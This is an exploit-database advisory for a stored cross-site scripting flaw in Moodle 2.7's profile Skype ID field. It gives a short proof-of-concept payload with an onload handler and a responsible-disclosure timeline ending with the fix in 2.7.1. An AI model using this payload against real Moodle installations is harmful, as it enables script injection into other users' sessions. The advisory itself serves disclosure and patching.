Moodle 2.7 - Persistent Cross-Site Scripting Vulnerability

ID 1337DAY-ID-22480
Type zdt
Reporter Osanda Malith
Modified 2014-07-27T00:00:00


Exploit for php platform in category web applications

                                            Title: Moodle 2.7 Persistent XSS
Moodle advisory:
Researched by: Osanda Malith Jayathissa (@OsandaMalith)
E-Mail: osanda[cat]
Original write-up:
[-] POC
1. Edit your profile
2. Click Optional
3. In Skype ID field inject this payload
x" onload="prompt('XSS by Osanda')">"
[-] Disclosure Timeline
2014-05-24: Responsibly disclosed to the Vendor
2014-05-27: Suggested a fix
2014-06-04: Fix got accepted
2014-07-21: Vendor releases a security announcement
2014-07-24: Released Moodle 2.7.1 stable with all patches

# [2018-04-02]  #